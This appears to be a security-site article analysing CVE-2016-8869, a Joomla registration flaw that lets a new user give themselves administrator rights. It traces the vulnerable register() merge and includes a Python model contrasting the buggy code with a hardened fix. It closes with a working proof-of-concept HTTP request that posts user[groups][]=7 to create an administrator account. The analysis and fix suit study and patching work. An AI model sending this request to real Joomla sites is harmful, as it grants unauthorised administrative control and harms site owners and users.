myhack58 | 佚名 (Anonymous) | MYHACK58:62201681701
History: Dec 01, 2016 - 12:00 a.m.

Joomla create-a-privileged-user exploit analysis (CVE-2016-8869) - vulnerability warning - the black bar safety net

www.myhack58.com

EPSS: 0.929 (High), percentile 99.1%

Vulnerability environment

Joomla 3.4.4 to 3.6.3

Vulnerability description

This vulnerability is the companion piece to the registration bypass analysed in the previous article, and of the two it has the more ingenious and more interesting idea. Its nature is much the same: both sit in the user registration code path.

Vulnerability analysis

The whole vulnerability, like the previous one, lies in components/com_users/controllers/user.php, in UsersControllerUser::register().

Request packet

First, let us walk through how UsersControllerUser::register() processes a registration, using a captured request.


```http
POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookie: 【COOKIE】
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------596020006637
Content-Length: 1036

-----------------------------596020006637
Content-Disposition: form-data; name="user[name]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[username]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[password1]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[password2]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[email1]"

[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name="user[email2]"

[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name="option"

com_users
-----------------------------596020006637
Content-Disposition: form-data; name="task"

user.register
-----------------------------596020006637
Content-Disposition: form-data; name="【TOKEN】"

1
-----------------------------596020006637--
```


The two values marked with 【】, the COOKIE and the TOKEN, must be supplied by the reader; the previous article explains in detail how to obtain them, so that is not repeated here. Note that the task field in the body is user.register: the POST value overrides the task=registration.register in the query string, so the request is routed to UsersControllerUser::register() rather than UsersControllerRegistration::register().

register()

The POST request above is handled by UsersControllerUser::register() in components/com_users/controllers/user.php.
![Figure 1](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/1.png)
Execution reaches $model->register($data), where $data is the user array taken straight from the POST data.

register($temp)

Following $model->register($data) leads to components/com_users/models/registration.php, UsersModelRegistration::register($temp).
![Figure 2](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/2.png)
Before $temp is traversed with foreach, this statement runs:

```php
$data = (array) $this->getData();
```

So $data already has content before the values from $temp are copied into it key by key, and that content includes the field that identifies the user's type.
![Figure 3](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/3.png)
As the figure shows, the groups array holds the value 2, which marks the account as an ordinary registered user. Because the foreach copies every key of $temp over $data, a groups key present in the POST data silently replaces that default.
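To make the merge concrete, here is an added Python model of the vulnerable register() logic next to a hardened variant. It is illustration code, not Joomla's PHP: the form field list and the per-field filters are simplified assumptions standing in for com_users' registration.xml and JForm::filter(), and the group ids (2 = Registered, the default new_usertype; 7 = Administrator) are the ones the article uses.

```python
"""Model of the mass-assignment bug in UsersModelRegistration::register().

Added illustration, not Joomla's own code.  It re-implements in Python the
merge the article describes (getData() defaults overwritten key by key by the
raw POST 'user' array) beside a hardened variant that copies only fields the
registration form declares, the way JForm::filter() does, and takes the group
from configuration rather than from the client.
"""

import re
from typing import Any, Dict

REGISTERED_GROUP = 2      # default value of the 'new_usertype' option
ADMINISTRATOR_GROUP = 7   # group id the PoC injects

# Fields the registration form declares, with the filter applied to each
# (assumption: simplified stand-in for registration.xml).  'groups' is
# deliberately absent: it is not a form field and must never come from the client.
REGISTRATION_FORM_FIELDS = {
    "name": "string",
    "username": "username",
    "password1": "raw",
    "password2": "raw",
    "email1": "string",
    "email2": "string",
}

# Characters Joomla's 'username' filter strips (control chars, < > " ' % &).
_USERNAME_FORBIDDEN = re.compile(r'[\x00-\x1F\x7F<>"\'%&]')


def get_data() -> Dict[str, Any]:
    """Default registration record, as UsersModelRegistration::getData() builds it."""
    return {
        "name": "", "username": "", "password1": "", "email1": "",
        "groups": [REGISTERED_GROUP],
    }


def vulnerable_register(temp: Dict[str, Any]) -> Dict[str, Any]:
    """The merge from the article: every POSTed key overwrites the default.

    UsersControllerUser::register() hands over the unfiltered POST array, so a
    'groups' key posted by the client lands in the record JUser::bind() saves.
    """
    data = get_data()
    for k, v in temp.items():       # foreach ($temp as $k => $v) { $data[$k] = $v; }
        data[k] = v
    return data


def _apply_filter(filter_name: str, value: Any) -> Any:
    """Minimal stand-in for JForm's per-field filters (assumption: simplified)."""
    if filter_name == "username":
        return _USERNAME_FORBIDDEN.sub("", str(value))
    if filter_name == "raw":
        return value
    return str(value)


def filter_to_form(temp: Dict[str, Any]) -> Dict[str, Any]:
    """Keep only declared form fields, like JForm::filter(); unknown keys are dropped."""
    return {
        name: _apply_filter(flt, temp[name])
        for name, flt in REGISTRATION_FORM_FIELDS.items()
        if name in temp
    }


def hardened_register(temp: Dict[str, Any]) -> Dict[str, Any]:
    """Register only with filtered input; group membership comes from config, never the client."""
    data = get_data()
    data.update(filter_to_form(temp))
    data["groups"] = [REGISTERED_GROUP]   # authoritative, whatever was posted
    return data


if __name__ == "__main__":
    # Constructed sample mirroring the PoC body: user[groups][]=7 arrives as ['7'].
    poc = {"name": "spoock", "username": "spoock", "password1": "123456",
           "password2": "123456", "email1": "a@b", "email2": "a@b", "groups": ["7"]}
    print("vulnerable groups:", vulnerable_register(poc)["groups"])
    print("hardened groups:  ", hardened_register(poc)["groups"])
```

The fix pattern is the one the non-deprecated registration controller already follows: pass the form-filtered data, not the raw request array, into the model, and never let the client choose its own group membership.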

Successful registration

When the whole flow completes, an ordinary user has been registered.
![Figure 4](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/4.png)

PoC

Knowing that the groups array is what identifies the user's group, we can simply add a groups array to the POST data with its value set to the Administrator group id (7 in Joomla), and an administrator user is created.

POST data


```http
POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookie: 【COOKIE】
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------596020006637
Content-Length: 1125

-----------------------------596020006637
Content-Disposition: form-data; name="user[name]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[username]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[password1]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[password2]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[email1]"

[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name="user[email2]"

[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name="user[groups][]"

7
-----------------------------596020006637
Content-Disposition: form-data; name="option"

com_users
-----------------------------596020006637
Content-Disposition: form-data; name="task"

user.register
-----------------------------596020006637
Content-Disposition: form-data; name="【TOKEN】"

1
-----------------------------596020006637--
```

